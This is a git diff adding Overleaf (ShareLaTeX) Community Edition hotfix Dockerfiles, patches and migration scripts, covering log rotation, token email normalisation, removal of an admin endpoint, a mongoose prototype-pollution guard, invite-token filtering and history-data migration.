/var/www/sharelatex/web/app/app/views/layout/footer.pug +@@ -32,7 +32,7 @@ footer.site-footer + if item.url + a(href=item.url, class=item.class) !{translate(item.text)} + else +- | !{translate(item.text)} ++ | !{item.text} + + ul.col-md-3.text-right + diff --git a/server-ce/hotfix/2.5.1/Dockerfile b/server-ce/hotfix/2.5.1/Dockerfile new file mode 100644 index 0000000..d22f912 --- /dev/null +++ b/server-ce/hotfix/2.5.1/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:2.5.0 + +# Patch #826: Fixes log path for contacts service to be picked up by logrotate +COPY contacts-run.patch /etc/service/contacts-sharelatex +RUN cd /etc/service/contacts-sharelatex && patch < contacts-run.patch + +# Patch #826: delete old logs for the contacts service +COPY delete-old-logs.patch /etc/my_init.d +RUN cd /etc/my_init.d && patch < delete-old-logs.patch \ +&& chmod +x /etc/my_init.d/10_delete_old_logs.sh + +# Patch #827: fix logrotate file permissions +RUN chmod 644 /etc/logrotate.d/sharelatex diff --git a/server-ce/hotfix/2.5.1/contacts-run.patch b/server-ce/hotfix/2.5.1/contacts-run.patch new file mode 100644 index 0000000..81ef36e --- /dev/null +++ b/server-ce/hotfix/2.5.1/contacts-run.patch @@ -0,0 +1,8 @@ +--- a/run ++++ b/run +@@ -7,4 +7,4 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30360" + fi + +-exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /var/www/sharelatex/contacts/app.js >> /var/log/sharelatex/contacts 2>&1 ++exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /var/www/sharelatex/contacts/app.js >> /var/log/sharelatex/contacts.log 2>&1 diff --git a/server-ce/hotfix/2.5.1/delete-old-logs.patch b/server-ce/hotfix/2.5.1/delete-old-logs.patch new file mode 100644 index 0000000..bc2be14 --- /dev/null +++ b/server-ce/hotfix/2.5.1/delete-old-logs.patch @@ -0,0 +1,10 @@ +--- /dev/null ++++ b/10_delete_old_logs.sh +@@ -0,0 +1,7 @@ ++#!/bin/sh ++set -e ++ ++# Up to version 2.5.0 the logs of the contacts service were written into a ++# file that was not picked up by logrotate. ++# The service is stable and we can safely discard any logs. 
++rm -vf /var/log/sharelatex/contacts diff --git a/server-ce/hotfix/2.5.2/12_update_token_email.js b/server-ce/hotfix/2.5.2/12_update_token_email.js new file mode 100644 index 0000000..5ac870b --- /dev/null +++ b/server-ce/hotfix/2.5.2/12_update_token_email.js @@ -0,0 +1,29 @@ +const Settings = require('settings-sharelatex') +const mongojs = require('mongojs') +const db = mongojs(Settings.mongo.url, ['tokens']) +// eslint-disable-next-line import/no-extraneous-dependencies +const async = require('async') + +exports.migrate = (client, done) => { + console.log(`>> Updating 'data.email' to lower case in tokens`) + + db.tokens.find({}, { 'data.email': 1 }, (err, tokens) => { + if (err) { + return done(err) + } + + async.eachSeries( + tokens, + (token, callback) => { + db.tokens.update( + { _id: token._id }, + { $set: { 'data.email': token.data.email.toLowerCase() } }, + callback + ) + }, + done + ) + }) +} + +exports.rollback = (client, done) => done() diff --git a/server-ce/hotfix/2.5.2/Dockerfile b/server-ce/hotfix/2.5.2/Dockerfile new file mode 100644 index 0000000..ddf596d --- /dev/null +++ b/server-ce/hotfix/2.5.2/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:2.5.1 + +# Patch: fixes registration token creation +COPY create-token-lowercase-email.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < create-token-lowercase-email.patch + +# Migration for tokens with invalid email addresses +ADD 12_update_token_email.js /var/www/sharelatex/migrations/12_update_token_email.js diff --git a/server-ce/hotfix/2.5.2/create-token-lowercase-email.patch b/server-ce/hotfix/2.5.2/create-token-lowercase-email.patch new file mode 100644 index 0000000..23dfaa3 --- /dev/null +++ b/server-ce/hotfix/2.5.2/create-token-lowercase-email.patch @@ -0,0 +1,11 @@ +--- /var/www/sharelatex/web/app/src/Features/User/UserRegistrationHandler.js ++++ /var/www/sharelatex/web/app/src/Features/User/UserRegistrationHandler.js +@@ -122,7 +122,7 @@ const UserRegistrationHandler = { + const ONE_WEEK = 7 * 24 * 60 * 60 // seconds + OneTimeTokenHandler.getNewToken( + 'password', +- { user_id: user._id.toString(), email }, ++ { user_id: user._id.toString(), email: user.email }, + { expiresIn: ONE_WEEK }, + (err, token) => { + if (err != null) { diff --git a/server-ce/hotfix/2.6.1/Dockerfile b/server-ce/hotfix/2.6.1/Dockerfile new file mode 100644 index 0000000..6df467b --- /dev/null +++ b/server-ce/hotfix/2.6.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:2.6.0-RC1 + +# Patch: fixes Project restore inserts bad projectId into deletedFiles +COPY document-deleter-object-id.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < document-deleter-object-id.patch diff --git a/server-ce/hotfix/2.6.1/document-deleter-object-id.patch b/server-ce/hotfix/2.6.1/document-deleter-object-id.patch new file mode 100644 index 0000000..a92ce49 --- /dev/null +++ b/server-ce/hotfix/2.6.1/document-deleter-object-id.patch @@ -0,0 +1,10 @@ +--- /var/www/sharelatex/web/app/src/Features/Project/ProjectDeleter.js ++++ /var/www/sharelatex/web/app/src/Features/Project/ProjectDeleter.js +@@ -278,6 +278,7 @@ async function deleteProject(projectId, options = {}) { + } + + async function undeleteProject(projectId, options = {}) { ++ projectId = ObjectId(projectId) + let deletedProject = await DeletedProject.findOne({ + 'deleterData.deletedProjectId': projectId + }).exec() diff --git a/server-ce/hotfix/2.6.2/Dockerfile b/server-ce/hotfix/2.6.2/Dockerfile new file mode 100644 index 0000000..2df3651 --- /dev/null +++ b/server-ce/hotfix/2.6.2/Dockerfile @@ 
-0,0 +1,5 @@ +FROM sharelatex/sharelatex:2.6.1 + +# Patch: fixes overleaf.com onboarding email being sent in CE/SP +COPY onboarding-email.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < onboarding-email.patch diff --git a/server-ce/hotfix/2.6.2/onboarding-email.patch b/server-ce/hotfix/2.6.2/onboarding-email.patch new file mode 100644 index 0000000..2d1fed5 --- /dev/null +++ b/server-ce/hotfix/2.6.2/onboarding-email.patch @@ -0,0 +1,25 @@ +--- /var/www/sharelatex/web/app/src/Features/User/UserCreator.js ++++ /var/www/sharelatex/web/app/src/Features/User/UserCreator.js +@@ -85,13 +85,15 @@ async function createNewUser(attributes, options = {}) { + } + + Analytics.recordEvent(user._id, 'user-registered') +- try { +- await UserOnboardingEmailQueueManager.scheduleOnboardingEmail(user) +- } catch (error) { +- logger.error( +- `Failed to schedule sending of onboarding email for user '${user._id}'`, +- error +- ) ++ if(Features.hasFeature('saas')) { ++ try { ++ await UserOnboardingEmailQueueManager.scheduleOnboardingEmail(user) ++ } catch (error) { ++ logger.error( ++ `Failed to schedule sending of onboarding email for user '${user._id}'`, ++ error ++ ) ++ } + } + + return user diff --git a/server-ce/hotfix/2.7.1/Dockerfile b/server-ce/hotfix/2.7.1/Dockerfile new file mode 100644 index 0000000..5d7cb3e --- /dev/null +++ b/server-ce/hotfix/2.7.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:2.7.0 + +# Patch: removes the /disconnectAllUsers endpoint +COPY remove-disconnect-endpoint.patch . +RUN patch -p0 < remove-disconnect-endpoint.patch diff --git a/server-ce/hotfix/2.7.1/remove-disconnect-endpoint.patch b/server-ce/hotfix/2.7.1/remove-disconnect-endpoint.patch new file mode 100644 index 0000000..c1328a2 --- /dev/null +++ b/server-ce/hotfix/2.7.1/remove-disconnect-endpoint.patch @@ -0,0 +1,14 @@ +--- /var/www/sharelatex/web/app/src/router.js +--- /var/www/sharelatex/web/app/src/router.js +@@ -995,11 +995,6 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + AdminController.unregisterServiceWorker + ) + +- privateApiRouter.post( +- '/disconnectAllUsers', +- AdminController.disconnectAllUsers +- ) +- + privateApiRouter.get('/perfTest', (req, res) => res.send('hello')) + + publicApiRouter.get('/status', (req, res) => { diff --git a/server-ce/hotfix/3.0.1/Dockerfile b/server-ce/hotfix/3.0.1/Dockerfile new file mode 100644 index 0000000..3db2819 --- /dev/null +++ b/server-ce/hotfix/3.0.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.0.0 + +# Patch: removes the /disconnectAllUsers endpoint +COPY remove-disconnect-endpoint.patch . 
+RUN patch -p0 < remove-disconnect-endpoint.patch diff --git a/server-ce/hotfix/3.0.1/remove-disconnect-endpoint.patch b/server-ce/hotfix/3.0.1/remove-disconnect-endpoint.patch new file mode 100644 index 0000000..c1328a2 --- /dev/null +++ b/server-ce/hotfix/3.0.1/remove-disconnect-endpoint.patch @@ -0,0 +1,14 @@ +--- /var/www/sharelatex/web/app/src/router.js +--- /var/www/sharelatex/web/app/src/router.js +@@ -995,11 +995,6 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + AdminController.unregisterServiceWorker + ) + +- privateApiRouter.post( +- '/disconnectAllUsers', +- AdminController.disconnectAllUsers +- ) +- + privateApiRouter.get('/perfTest', (req, res) => res.send('hello')) + + publicApiRouter.get('/status', (req, res) => { diff --git a/server-ce/hotfix/3.1.1/Dockerfile b/server-ce/hotfix/3.1.1/Dockerfile new file mode 100644 index 0000000..b0b5b6f --- /dev/null +++ b/server-ce/hotfix/3.1.1/Dockerfile @@ -0,0 +1,11 @@ +FROM sharelatex/sharelatex:3.1.0 + +# Patch: fixes ShareLaTeX history navigation +# https://github.com/overleaf/overleaf/issues/1035 +COPY fix-history-navigation.patch . +RUN patch -p0 < fix-history-navigation.patch + + +# Rebuild client +# -------------- +RUN node genScript compile | bash diff --git a/server-ce/hotfix/3.1.1/fix-history-navigation.patch b/server-ce/hotfix/3.1.1/fix-history-navigation.patch new file mode 100644 index 0000000..0033abf --- /dev/null +++ b/server-ce/hotfix/3.1.1/fix-history-navigation.patch @@ -0,0 +1,16 @@ +--- services/web/frontend/js/ide/history/controllers/HistoryListController.js ++++ services/web/frontend/js/ide/history/controllers/HistoryListController.js +@@ -62,7 +62,12 @@ App.controller('HistoryListController', function ($scope, $modal, ide) { + return (() => { + const result = [] + for (const update of Array.from($scope.history.updates)) { +- let inSelection ++ ++ // replacing this declaration with `let` introduces a bug in history point selection: ++ // https://github.com/overleaf/overleaf/issues/1035 ++ // eslint-disable-next-line no-var ++ var inSelection ++ + if (update.selectedTo) { + inSelection = true + beforeSelection = false \ No newline at end of file diff --git a/server-ce/hotfix/3.2.1/Dockerfile b/server-ce/hotfix/3.2.1/Dockerfile new file mode 100644 index 0000000..766eefa --- /dev/null +++ b/server-ce/hotfix/3.2.1/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:3.2.0 + +# Patch: fixes the broken source editor +# https://github.com/overleaf/overleaf/issues/1043 +COPY disable-codemirror.patch . 
+RUN patch -p0 < disable-codemirror.patch diff --git a/server-ce/hotfix/3.2.1/disable-codemirror.patch b/server-ce/hotfix/3.2.1/disable-codemirror.patch new file mode 100644 index 0000000..139fa90 --- /dev/null +++ b/server-ce/hotfix/3.2.1/disable-codemirror.patch @@ -0,0 +1,15 @@ +--- services/web/app/src/Features/Project/ProjectController.js +--- services/web/app/src/Features/Project/ProjectController.js +@@ -1134,11 +1134,7 @@ const ProjectController = { + detachRole = req.params.detachRole + } + +- const showNewSourceEditorOption = +- (newSourceEditorAssignment && +- newSourceEditorAssignment.variant === 'codemirror') || +- user.betaProgram || +- shouldDisplayFeature('new_source_editor', false) // also allow override via ?new_source_editor=true ++ const showNewSourceEditorOption = false // disabled in CE/SP (Hotfix 3.2.1) + + const showSymbolPalette = + !Features.hasFeature('saas') || diff --git a/server-ce/hotfix/3.2.2/Dockerfile b/server-ce/hotfix/3.2.2/Dockerfile new file mode 100644 index 0000000..e4b04cf --- /dev/null +++ b/server-ce/hotfix/3.2.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.2.1 + +# Fixes compilation errors in embedded compiles +# https://github.com/overleaf/overleaf/issues/1044 +ENV PATH="${PATH}:/usr/local/texlive/2022/bin/x86_64-linux" diff --git a/server-ce/hotfix/3.3.2/Dockerfile b/server-ce/hotfix/3.3.2/Dockerfile new file mode 100644 index 0000000..6cfe14f --- /dev/null +++ b/server-ce/hotfix/3.3.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.3.0 + +# Patch: add migration for convert_archived_state script +COPY pr_10442.patch . +RUN patch -p0 < pr_10442.patch diff --git a/server-ce/hotfix/3.3.2/pr_10442.patch b/server-ce/hotfix/3.3.2/pr_10442.patch new file mode 100644 index 0000000..6f5353d --- /dev/null +++ b/server-ce/hotfix/3.3.2/pr_10442.patch @@ -0,0 +1,132 @@ +--- services/web/scripts/convert_archived_state.js ++++ services/web/scripts/convert_archived_state.js +@@ -6,62 +6,77 @@ + const { promiseMapWithLimit } = require('../app/src/util/promises') + + // $ node scripts/convert_archived_state.js FIRST,SECOND +-const STAGE = process.argv.pop() + +-async function main() { +- if (STAGE.includes('FIRST')) { +- await batchedUpdate( +- 'projects', +- { archived: false }, +- { +- $set: { archived: [] }, +- } +- ) ++async function main(STAGE) { ++ for (const FIELD of ['archived', 'trashed']) { ++ if (STAGE.includes('FIRST')) { ++ await batchedUpdate( ++ 'projects', ++ { [FIELD]: false }, ++ { ++ $set: { [FIELD]: [] }, ++ } ++ ) + +- console.error('Done, with first part') +- } ++ console.error('Done, with first part for field:', FIELD) ++ } + +- if (STAGE.includes('SECOND')) { +- await batchedUpdate('projects', { archived: true }, performUpdate, { +- _id: 1, +- owner_ref: 1, +- collaberator_refs: 1, +- readOnly_refs: 1, +- tokenAccessReadAndWrite_refs: 1, +- tokenAccessReadOnly_refs: 1, +- }) ++ if (STAGE.includes('SECOND')) { ++ await batchedUpdate( ++ 'projects', ++ { [FIELD]: true }, ++ async function performUpdate(collection, nextBatch) { ++ await promiseMapWithLimit( ++ WRITE_CONCURRENCY, ++ nextBatch, ++ async project => { ++ try { ++ await upgradeFieldToArray({ collection, project, FIELD }) ++ } catch (err) { ++ console.error(project._id, err) ++ throw err ++ } ++ } ++ ) ++ }, ++ { ++ _id: 1, ++ owner_ref: 1, ++ collaberator_refs: 1, ++ readOnly_refs: 1, ++ tokenAccessReadAndWrite_refs: 1, ++ tokenAccessReadOnly_refs: 1, ++ } ++ ) + +- console.error('Done, with second part') ++ console.error('Done, with second part for field:', 
FIELD) ++ } + } + } + +-main() +- .then(() => { +- process.exit(0) +- }) +- .catch(error => { +- console.error({ error }) +- process.exit(1) +- }) +- +-async function performUpdate(collection, nextBatch) { +- await promiseMapWithLimit(WRITE_CONCURRENCY, nextBatch, project => +- setArchived(collection, project) +- ) ++module.exports = main ++ ++if (require.main === module) { ++ main(process.argv.pop()) ++ .then(() => { ++ process.exit(0) ++ }) ++ .catch(error => { ++ console.error({ error }) ++ process.exit(1) ++ }) + } + +-async function setArchived(collection, project) { +- const archived = calculateArchivedArray(project) +- ++async function upgradeFieldToArray({ collection, project, FIELD }) { + return collection.updateOne( + { _id: project._id }, + { +- $set: { archived }, ++ $set: { [FIELD]: getAllUserIds(project) }, + } + ) + } + +-function calculateArchivedArray(project) { ++function getAllUserIds(project) { + return _.unionWith( + [project.owner_ref], + project.collaberator_refs, +--- /dev/null ++++ services/web/migrations/20221111111111_ce_sp_convert_archived_state.js +@@ -0,0 +1,9 @@ ++const runScript = require('../scripts/convert_archived_state') ++ ++exports.tags = ['server-ce', 'server-pro'] ++ ++exports.migrate = async () => { ++ await runScript('FIRST,SECOND') ++} ++ ++exports.rollback = async () => {} diff --git a/server-ce/hotfix/3.5.1/Dockerfile b/server-ce/hotfix/3.5.1/Dockerfile new file mode 100644 index 0000000..cd10840 --- /dev/null +++ b/server-ce/hotfix/3.5.1/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:3.5.0 + +# Patch: fix German locales +COPY fix_de_locales.patch . +RUN patch -p0 < fix_de_locales.patch +RUN node genScript compile | bash diff --git a/server-ce/hotfix/3.5.1/fix_de_locales.patch b/server-ce/hotfix/3.5.1/fix_de_locales.patch new file mode 100644 index 0000000..54ed1f1 --- /dev/null +++ b/server-ce/hotfix/3.5.1/fix_de_locales.patch @@ -0,0 +1,10 @@ +--- services/web/locales/de.json ++++ services/web/locales/de.json +@@ -348,7 +348,6 @@ + "edit_dictionary_empty": "Dein benutzerdefiniertes Wörterbuch ist leer.", + "edit_dictionary_remove": "Aus Wörterbuch entfernen", + "editing": "Bearbeitung", +- "editor_and_pdf": "Editor & PDF", + "editor_disconected_click_to_reconnect": "Editor wurde getrennt", + "editor_only_hide_pdf": "Nur Editor <0>(PDF ausblenden)", + "editor_resources": "Editor-Literatur", diff --git a/server-ce/hotfix/3.5.10/Dockerfile b/server-ce/hotfix/3.5.10/Dockerfile new file mode 100644 index 0000000..ae09f89 --- /dev/null +++ b/server-ce/hotfix/3.5.10/Dockerfile @@ -0,0 +1,9 @@ +FROM sharelatex/sharelatex:3.5.9 + +# Patch: clear invite and invite tokens through the websocket +COPY pr_13427.patch . +RUN patch -p0 < pr_13427.patch + +# Patch: https://github.com/Automattic/mongoose/commit/f1efabf350522257364aa5c2cb36e441cf08f1a2 +COPY mongoose_proto.patch . 
+RUN patch -p0 < mongoose_proto.patch diff --git a/server-ce/hotfix/3.5.10/mongoose_proto.patch b/server-ce/hotfix/3.5.10/mongoose_proto.patch new file mode 100644 index 0000000..37559db --- /dev/null +++ b/server-ce/hotfix/3.5.10/mongoose_proto.patch @@ -0,0 +1,12 @@ +--- node_modules/mongoose/lib/document.js ++++ node_modules/mongoose/lib/document.js +@@ -689,6 +689,10 @@ function init(self, obj, doc, opts, prefix) { + + function _init(index) { + i = keys[index]; ++ // avoid prototype pollution ++ if (i === '__proto__' || i === 'constructor') { ++ return; ++ } + path = prefix + i; + schema = self.$__schema.path(path); diff --git a/server-ce/hotfix/3.5.10/pr_13427.patch b/server-ce/hotfix/3.5.10/pr_13427.patch new file mode 100644 index 0000000..716b7ce --- /dev/null +++ b/server-ce/hotfix/3.5.10/pr_13427.patch @@ -0,0 +1,92 @@ +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -73,6 +73,7 @@ async function joinProject(req, res, next) { + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } + project.members = [] ++ project.invites = [] + } + // Only show the 'renamed or deleted' message once + if (project.deletedByExternalDataSource) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -48,19 +48,13 @@ + deletedDocsFromDocstore + ), + members: [], +- invites, ++ invites: this.buildInvitesView(invites), + imageName: + project.imageName != null + ? Path.basename(project.imageName) + : undefined, + } + +- if (result.invites == null) { +- result.invites = [] +- } +- result.invites.forEach(invite => { +- delete invite.token +- }) + ;({ owner, ownerFeatures, members } = + this.buildOwnerAndMembersViews(members)) + result.owner = owner +@@ -99,7 +93,7 @@ + let owner = null + let ownerFeatures = null + const filteredMembers = [] +- for (const member of Array.from(members || [])) { ++ for (const member of members || []) { + if (member.privilegeLevel === 'owner') { + ownerFeatures = member.user.features + owner = this.buildUserModelView(member.user, 'owner') +@@ -128,24 +122,15 @@ + }, + + buildFolderModelView(folder) { +- let file + const fileRefs = _.filter(folder.fileRefs || [], file => file != null) + return { + _id: folder._id, + name: folder.name, +- folders: Array.from(folder.folders || []).map(childFolder => ++ folders: (folder.folders || []).map(childFolder => + this.buildFolderModelView(childFolder) + ), +- fileRefs: (() => { +- const result = [] +- for (file of Array.from(fileRefs)) { +- result.push(this.buildFileModelView(file)) +- } +- return result +- })(), +- docs: Array.from(folder.docs || []).map(doc => +- this.buildDocModelView(doc) +- ), ++ fileRefs: fileRefs.map(file => this.buildFileModelView(file)), ++ docs: (folder.docs || []).map(doc => this.buildDocModelView(doc)), + } + }, + +@@ -164,4 +149,21 @@ + name: doc.name, + } + }, ++ ++ buildInvitesView(invites) { ++ if (invites == null) { ++ return [] ++ } ++ return invites.map(invite => ++ _.pick(invite, [ ++ '_id', ++ 'createdAt', ++ 'email', ++ 'expires', ++ 'privileges', ++ 'projectId', ++ 'sendingUserId', ++ ]) ++ ) ++ }, + } diff --git a/server-ce/hotfix/3.5.11/Dockerfile b/server-ce/hotfix/3.5.11/Dockerfile new file mode 100644 index 0000000..650f194 --- /dev/null +++ b/server-ce/hotfix/3.5.11/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:3.5.10 + +# Patch: Drop the old history collections and increase mongo query timeout +ADD 
clean_sl_history_data.js /overleaf/services/web/scripts/history/clean_sl_history_data.js + +# Patch: convert large deleted docs to files +COPY pr_14200.patch . +RUN patch -p0 < pr_14200.patch diff --git a/server-ce/hotfix/3.5.11/clean_sl_history_data.js b/server-ce/hotfix/3.5.11/clean_sl_history_data.js new file mode 100644 index 0000000..a7497c8 --- /dev/null +++ b/server-ce/hotfix/3.5.11/clean_sl_history_data.js @@ -0,0 +1,70 @@ +// Increase default mongo query timeout from 1min to 1h +process.env.MONGO_SOCKET_TIMEOUT = process.env.MONGO_SOCKET_TIMEOUT || '3600000' +const { waitForDb, db } = require('../../app/src/infrastructure/mongodb') + +async function main() { + await checkAllProjectsAreMigrated() + await setAllowDowngradeToFalse() + await deleteHistoryCollections() + console.log('Legacy history data cleaned up successfully') + process.exit(0) +} + +async function checkAllProjectsAreMigrated() { + console.log('checking all projects are migrated to Full Project History') + + const count = await db.projects.countDocuments({ + 'overleaf.history.display': { $ne: true }, + }) + + if (count === 0) { + console.log('All projects are migrated to Full Project History') + } else { + console.error( + `There are ${count} projects that are not migrated to Full Project History,` + + ` please complete the migration before running this script again.` + ) + process.exit(1) + } +} + +async function setAllowDowngradeToFalse() { + console.log('unsetting `allowDowngrade` flag in all projects') + await db.projects.updateMany( + { + 'overleaf.history.id': { $exists: true }, + 'overleaf.history.allowDowngrade': true, + }, + { $unset: { 'overleaf.history.allowDowngrade': 1 } } + ) + console.log('unsetting `allowDowngrade` flag in all projects - Done') +} + +async function deleteHistoryCollections() { + await gracefullyDropCollection(db.docHistory) + await gracefullyDropCollection(db.docHistoryIndex) + await gracefullyDropCollection(db.projectHistoryMetaData) +} + +async function gracefullyDropCollection(collection) { + const collectionName = collection.collectionName + console.log(`removing \`${collectionName}\` data`) + try { + await collection.drop() + } catch (err) { + if (err.code === 26) { + // collection already deleted + console.log(`removing \`${collectionName}\` data - Already removed`) + } else { + throw err + } + } + console.log(`removing \`${collectionName}\` data - Done`) +} + +waitForDb() + .then(main) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/3.5.11/pr_14200.patch b/server-ce/hotfix/3.5.11/pr_14200.patch new file mode 100644 index 0000000..57dd5f9 --- /dev/null +++ b/server-ce/hotfix/3.5.11/pr_14200.patch @@ -0,0 +1,95 @@ +--- services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js ++++ services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js +@@ -1,6 +1,9 @@ ++const _ = require('lodash') ++const fs = require('fs') + const { ReadPreference, ObjectId } = require('mongodb') + const { db } = require('../../../../app/src/infrastructure/mongodb') + const Settings = require('@overleaf/settings') ++const logger = require('@overleaf/logger') + + const ProjectHistoryHandler = require('../../../../app/src/Features/Project/ProjectHistoryHandler') + const HistoryManager = require('../../../../app/src/Features/History/HistoryManager') +@@ -8,6 +11,8 @@ const ProjectHistoryController = require('./ProjectHistoryController') + const ProjectEntityHandler = require('../../../../app/src/Features/Project/ProjectEntityHandler') + const 
ProjectEntityUpdateHandler = require('../../../../app/src/Features/Project/ProjectEntityUpdateHandler') + const DocumentUpdaterHandler = require('../../../../app/src/Features/DocumentUpdater/DocumentUpdaterHandler') ++const { Doc } = require('../../../../app/src/models/Doc') ++const FileWriter = require('../../../../app/src/infrastructure/FileWriter') + + // Timestamp of when 'Enable history for SL in background' release + const ID_WHEN_FULL_PROJECT_HISTORY_ENABLED = +@@ -340,9 +345,33 @@ async function anyDocHistoryIndexExists(project) { + ) + } + ++async function convertDeletedDocToFile(projectId, docId, userId, source, doc) { ++ // write the doc to a temporary file and upload to filestore ++ const tmpFilePath = await FileWriter.promises.writeLinesToDisk( ++ projectId, ++ doc.lines ++ ) ++ await ProjectEntityUpdateHandler.promises.upsertFileWithPath( ++ projectId, ++ `/_deleted/${docId}/${doc.name}`, ++ tmpFilePath, ++ null, ++ userId, ++ source ++ ) ++ // hard delete the original doc, otherwise it will get picked up again ++ // by readDeletedDocs in ProjectHistoryController and the final ++ // resync of the history will fail. ++ await db.docs.deleteOne({ _id: docId }) ++ await db.docOps.deleteOne({ doc_id: docId }) ++ // clean up the temporary file ++ await fs.promises.unlink(tmpFilePath) ++} ++ + async function convertLargeDocsToFile(projectId, userId) { +- const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) + let convertedDocCount = 0 ++ const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) ++ // Convert large docs to files + for (const doc of Object.values(docs)) { + const sizeBound = JSON.stringify(doc.lines) + if (docIsTooLarge(sizeBound, doc.lines, Settings.max_doc_length)) { +@@ -355,6 +384,39 @@ async function convertLargeDocsToFile(projectId, userId) { + convertedDocCount++ + } + } ++ // Convert deleted docs to files, these cannot be converted by ++ // ProjectEntityUpdateHandler so we do it manually ++ const docsCursor = Doc.find({ ++ project_id: ObjectId(projectId), ++ }) ++ .lean() ++ .cursor() ++ for await (const doc of docsCursor) { ++ // check whether the doc is present in the filetree instead of ++ // relying on the deletedAt property ++ const docExistsInFiletree = _.find(docs, existingDoc => ++ existingDoc._id.equals(doc._id) ++ ) ++ if (docExistsInFiletree || doc.inS3) { ++ continue ++ } ++ const sizeBound = JSON.stringify(doc.lines) ++ if (docIsTooLarge(sizeBound, doc.lines, Settings.max_doc_length)) { ++ const docId = doc._id.toString() ++ if (!_.isEmpty(doc.ranges)) { ++ throw new Error(`found too large deleted doc with ranges: ${docId}`) ++ } ++ logger.warn({ projectId, docId }, 'converting large deleted doc') ++ await convertDeletedDocToFile( ++ projectId, ++ doc._id, ++ userId, ++ 'history-migration', ++ doc ++ ) ++ convertedDocCount++ ++ } ++ } + return convertedDocCount + } diff --git a/server-ce/hotfix/3.5.12/Dockerfile b/server-ce/hotfix/3.5.12/Dockerfile new file mode 100644 index 0000000..a6eef50 --- /dev/null +++ b/server-ce/hotfix/3.5.12/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.11 + +# Patch: fix matching version when rewinding history +COPY fix-matching-version-error.patch . 
+RUN patch -p0 < fix-matching-version-error.patch diff --git a/server-ce/hotfix/3.5.12/fix-matching-version-error.patch b/server-ce/hotfix/3.5.12/fix-matching-version-error.patch new file mode 100644 index 0000000..dd768c2 --- /dev/null +++ b/server-ce/hotfix/3.5.12/fix-matching-version-error.patch @@ -0,0 +1,22 @@ +--- services/track-changes/app/js/ZipManager.js ++++ services/track-changes/app/js/ZipManager.js +@@ -95,6 +95,19 @@ async function rewindDoc(projectId, docId, zipfile) { + continue + } + ++ if (previousUpdate && update.v >= previousUpdate.v) { ++ logger.warn( ++ { ++ projectId, ++ docId, ++ previousUpdateVersion: previousUpdate.v, ++ updateVersion: update.v, ++ }, ++ 'adjusting version for update with matching version' ++ ) ++ update.v = previousUpdate.v - 1 ++ } ++ + const updatePath = `${id}/updates/${update.v}` + + try { diff --git a/server-ce/hotfix/3.5.13/Dockerfile b/server-ce/hotfix/3.5.13/Dockerfile new file mode 100644 index 0000000..0ae5f77 --- /dev/null +++ b/server-ce/hotfix/3.5.13/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.12 + +# Patch: fix soft history retry in cron job +COPY history_soft_retry.patch . +RUN patch -p0 < history_soft_retry.patch diff --git a/server-ce/hotfix/3.5.13/history_soft_retry.patch b/server-ce/hotfix/3.5.13/history_soft_retry.patch new file mode 100644 index 0000000..a28855f --- /dev/null +++ b/server-ce/hotfix/3.5.13/history_soft_retry.patch @@ -0,0 +1,8 @@ +--- cron/project-history-retry-soft.sh ++++ cron/project-history-retry-soft.sh +@@ -8,4 +8,4 @@ echo "-----------------------------------" + + PROJECT_HISTORY_URL='http://localhost:3054' + +-curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" ++curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/3.5.2/Dockerfile b/server-ce/hotfix/3.5.2/Dockerfile new file mode 100644 index 0000000..ff4d776 --- /dev/null +++ b/server-ce/hotfix/3.5.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.1 + +# Patch: improvements to history migration script +COPY migrate_history_fixes.patch . 
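The 3.5.12 ZipManager patch above guards the history export path: rewindDoc replays a doc's updates from newest to oldest, and each update is written to a zip entry keyed by its version (`${id}/updates/${update.v}`), so two updates carrying the same version would collide. A minimal sketch of the clamping idea, assuming an updates array already ordered newest-first (the real code does this inside a larger loop, with logging):

// force versions to be strictly decreasing while walking newest-to-oldest,
// mirroring the `update.v = previousUpdate.v - 1` adjustment in the patch
function clampVersions(updates) {
  let previousUpdate = null
  for (const update of updates) {
    if (previousUpdate && update.v >= previousUpdate.v) {
      update.v = previousUpdate.v - 1
    }
    previousUpdate = update
  }
  return updates
}

// e.g. duplicate versions [5, 5, 4] become unique [5, 4, 3]
clampVersions([{ v: 5 }, { v: 5 }, { v: 4 }])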
